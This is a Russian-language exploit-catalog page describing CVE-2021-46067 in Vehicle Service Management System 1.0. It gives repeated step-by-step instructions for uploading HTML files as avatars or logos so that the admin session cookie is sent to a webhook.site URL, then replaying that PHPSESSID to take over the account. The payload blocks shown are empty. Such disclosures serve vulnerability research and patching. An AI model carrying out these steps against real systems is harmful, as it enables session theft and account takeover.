Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - В Vehicle Service Management System 1.0 злоумышленник может украсть cookies, что приводит к полному захвату учетной записи. | Kitploit
Инструменты/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubsanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover

Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

CVE-2021-46067 - В Vehicle Service Management System 1.0 злоумышленник может украсть cookies, что приводит к полному захвату учетной записи.

Репозиторий
34 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-46067

Название эксплойта: Vehicle Service Management System - 'Multiple' Кража куки приводит к полному захвату учетной записи

Автор эксплойта: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 КРИТИЧЕСКИЙ

Ссылки:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

Описание:

В Vehicle Service Management System 1.0 злоумышленник может украсть куки, что приводит к полному захвату учетной записи.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Моя учетная запись» http://localhost/vehicle_service/admin/?page=user
  3. Сгенерируйте URL-адрес Webhook - https://webhook.site
  4. Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
  2. В разделе «Моя учетная запись» введите все необходимые данные и выберите HTML-файл в поле «Аватар».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение аватара в новой вкладке и проверьте статус Webhook.
  5. Мы получили запрос, он содержит PHPSESSID.
  6. Скопируйте значение PHPSESSID и откройте любой другой браузер.
  7. Перейдите в панель администратора http://localhost/vehicle_service/admin
  8. Проверьте значения куки и измените значение PHPSESSID на скопированное.
  9. Теперь откройте панель администратора http://localhost/vehicle_service/admin
  10. Успешный вход в учетную запись. Захват учетной записи выполнен успешно.

2. Vehicle Service Management System - 'Список пользователей' (/admin/?page=user/manage_user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Список пользователей» и нажмите кнопку «Создать нового».
  3. Сгенерируйте URL-адрес Webhook - https://webhook.site
  4. Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
  2. В разделе «Создать нового пользователя» введите все необходимые данные и выберите HTML-файл в поле «Аватар».
  3. Нажмите кнопку «Сохранить».
  4. Откройте изображение аватара в новой вкладке и проверьте статус Webhook.
  5. Мы получили запрос, он содержит PHPSESSID.
  6. Скопируйте значение PHPSESSID и откройте любой другой браузер.
  7. Перейдите в панель администратора http://localhost/vehicle_service/admin
  8. Проверьте значения куки и измените значение PHPSESSID на скопированное.
  9. Теперь откройте панель администратора http://localhost/vehicle_service/admin
  10. Успешный вход в учетную запись. Захват учетной записи выполнен успешно.

3. Vehicle Service Management System - 'Настройки-Логотип системы' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info
  3. Сгенерируйте URL-адрес Webhook - https://webhook.site
  4. Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
  2. В разделе «Настройки» введите все необходимые данные и выберите HTML-файл в поле «Логотип системы».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение логотипа системы в новой вкладке и проверьте статус Webhook.
  5. Мы получили запрос, он содержит PHPSESSID.
  6. Скопируйте значение PHPSESSID и откройте любой другой браузер.
  7. Перейдите в панель администратора http://localhost/vehicle_service/admin
  8. Проверьте значения куки и измените значение PHPSESSID на скопированное.
  9. Теперь откройте панель администратора http://localhost/vehicle_service/admin
  10. Успешный вход в учетную запись. Захват учетной записи выполнен успешно.

4. Vehicle Service Management System - 'Настройки-Обложка сайта' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info
  3. Сгенерируйте URL-адрес Webhook - https://webhook.site
  4. Скопируйте уникальный URL-адрес Webhook и вставьте его в приведенный ниже HTML-код.

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. Сохраните приведенный выше HTML-код, например: Cookie Stealing.html
  2. В разделе «Настройки» введите все необходимые данные и выберите HTML-файл в поле «Обложка сайта».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение обложки сайта в новой вкладке и проверьте статус Webhook.
  5. Мы получили запрос, он содержит PHPSESSID.
  6. Скопируйте значение PHPSESSID и откройте любой другой браузер.
  7. Перейдите в панель администратора http://localhost/vehicle_service/admin
  8. Проверьте значения куки и измените значение PHPSESSID на скопированное.
  9. Теперь откройте панель администратора http://localhost/vehicle_service/admin
  10. Успешный вход в учетную запись. Захват учетной записи выполнен успешно.

Воздействие:

Злоумышленник загружает вредоносный HTML-файл, который перенаправляет на сторонний сайт, и куки становятся доступными в запросе. Это приводит к полному захвату учетной записи.

Смягчение:

Рекомендуется проверять функциональность загрузки файлов и выполнять вторичные проверки в сессии.

Скачать инструмент